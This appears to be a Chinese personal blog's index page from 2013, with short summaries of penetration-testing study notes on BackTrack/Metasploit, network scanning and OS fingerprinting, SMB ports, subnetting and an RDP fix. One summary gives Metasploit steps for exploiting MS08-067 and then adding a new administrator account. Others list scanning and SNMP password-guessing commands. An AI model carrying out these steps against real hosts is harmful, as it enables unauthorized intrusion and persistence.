寻步 - 博客园

2013年11月27日

BackTrack 5 R3 Metasploit更新方法及msfupdae,msconsole出错解决办法

摘要：更新Metasploit最新版本:#cd /opt/metasploit/ #rm -rf msf3 #git clone --depth=1 git://github.com/rapid7/metasploit-framework msf3 执行msfupdate出错如下: Gem::Installer::ExtensionBuildError:ERROR:Failedtobuildgemnativeextension. /opt/metasploit/ruby/bin/rubyextconf.rb checkingforpg_config...yes Usingconfigvaluesfr 阅读全文

posted @ 2013-11-27 01:15 寻步阅读(1267) 评论(0) 推荐(0) 编辑

操作系统指纹

摘要： root@bt:/pentest/enumeration/irpas# p0f 被动地接受包，可以探测连接自己的主机的操作系统版本。cisco的ips的操作系统学习用的就是这个。root@bt:~# xprobe2 192.168.1.102 主动探测目标系统阅读全文

posted @ 2013-11-27 01:13 寻步阅读(276) 评论(0) 推荐(0) 编辑

2013年11月26日

扫描工具

摘要： genlist -s 192.168.1.\* 只显示目标网络的活动主机hping3 -c 2 192.168.1.102 hping3工具可以自定义包发送，格式比较复杂。我们这里是最简单的应用。nbtscan 192.168.1.1-254 只能扫描出活动着的微软主机，速度很快。nping -c 1 --tcp -p 80 --flags syn 192.168.1.102 支持比较好的自定义包root@bt:/pentest/enumeration/snmp/onesixtyone# ./onesixtyone -c dict.txt 192.168.1.102 snmp服务密码... 阅读全文

posted @ 2013-11-26 23:11 寻步阅读(394) 评论(0) 推荐(0) 编辑

2013年11月25日

ms08_067利用过程

摘要：进入msf。show exploits。use exploit/windows/smb/ms08_067_netapi。show playloads。set PLAYLOAD windows/shell/bind_tcpset RHOST ip地址等选项。set target 41。exploit。得到cmd命令行：添加用户、提权：net user newuser 123456 /addnet localgroup administrators newuser /add 阅读全文

posted @ 2013-11-25 21:45 寻步阅读(333) 评论(0) 推荐(0) 编辑

vmware中网络连接方式介绍

摘要：阅读全文

posted @ 2013-11-25 20:55 寻步阅读(118) 评论(0) 推荐(0) 编辑

2013年8月20日

SQL注入攻击

摘要： SQL注入攻击：http://www.cnblogs.com/tanshuicai/archive/2010/02/03/1664900.htmlSQL注入攻防详解：http://www.cnblogs.com/heyuquan/archive/2012/10/31/2748577.html 阅读全文

posted @ 2013-08-20 00:36 寻步阅读(226) 评论(0) 推荐(0) 编辑

2013年8月2日

SMB/CIFS协议解析

摘要： 1、SMB协议与CIFS协议的区别 139端口是一种TCP端口，该端口在通过网上邻居访问局域网中的共享文件或共享打印机时就能发挥作用。445端口也是一种TCP端口，该端口在 Windows 2000 Server或Windows Server 2003系统中发挥的作用与139端口是完全相同的。具体地说，它也是提供局域网中文件或打印机共享服务。不过该端口是基于CIFS协议（通用因特网文件系统协议）工作的，而139端口是基于SMB协议（Server Message Block服务器协议族）对外提供共享服务。NBT(NetBIOS over TCP/IP)使用137, 138 (UDP) and 1 阅读全文

posted @ 2013-08-02 16:25 寻步阅读(7064) 评论(0) 推荐(0) 编辑

2013年5月29日

深信服上网行为管理

摘要： Ingress.exe：任务管理中出现这个邪恶的进程，恭喜你中招了。这个进程是深信服上网监控的客户端，可以监控你浏览过的网页/发过的帖子/发送的文件，据说还可以监控QQ等IM的聊天内容以及各种密码。所以，如果电脑中出现Ingress.exe进程，就低调做人好好工作吧。如何卸载/绕过Ingress.exe？杀掉Ingress.exe后基本都会导致本机断网，据网上牛人试验传统方法如杀进程删文件/创建虚拟桌面等方法都无效，只有一种很复杂的方法可以屏蔽。阅读全文

posted @ 2013-05-29 22:29 寻步阅读(3133) 评论(0) 推荐(0) 编辑

子网掩码

摘要： 192.168.0.1/24/24是指子网掩码,24个1即： 11111111.11111111.11111111.00000000 ,一个255 是8个1,转换成十进制就是：255.255.255.0。/24就是前三个ip数是固定的，最后一个1就是不确定的，所以192.168.0、192.168.0.2、192.168.0.3在同一个网段内，而192.168.2.1不在同一网段内，必须通过路由器才能通。如果把前面的IP也变成二进制数，即： 11000000.10101000.00000000.00000001 （192.168.0.1） 11111111.11111111.11111111. 阅读全文

posted @ 2013-05-29 22:28 寻步阅读(737) 评论(0) 推荐(0) 编辑

2013年5月26日

远程桌面连接提示“由于账户限制，您无法登陆”解决

摘要：由于需要，在一个大局域网里对一个朋友的电脑远程桌面连接进行控制。在他的电脑端设置“允许用户远程连接到此计算机”。然后运行mstsc打开远程桌面，填入ip进行访问的时候却提示“由于账户限制，您无法登陆”。经查证，这是由于windows安全策略里设置了“使用空白密码的本地账户只允许进行控制台登录”的缘故。这样解决方法其实就很简单了一、设置密码然后进行登陆二、更改设置“使用空白密码的本地账户只允许进行控制台登录”为禁用。更改方法如下：1、打开“组策略”。——gpedit.msc2、依次展开：计算机配置—windows设置—安全设置—本地策略—安全选项3、找到“账户：使用空白密码的本地账户只允许进行控阅读全文

posted @ 2013-05-26 00:42 寻步阅读(770) 评论(0) 推荐(0) 编辑